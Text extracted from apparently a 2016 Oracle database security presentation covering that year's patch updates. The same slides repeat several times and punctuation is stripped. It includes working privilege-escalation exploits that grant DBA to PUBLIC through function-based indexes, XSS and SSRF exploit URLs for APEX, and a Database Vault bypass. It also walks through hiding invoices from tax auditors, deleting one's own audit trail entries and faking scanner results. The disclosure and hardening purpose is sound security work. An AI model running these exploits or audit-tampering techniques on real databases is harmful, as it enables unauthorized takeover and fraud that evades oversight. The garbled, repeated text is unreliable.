July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
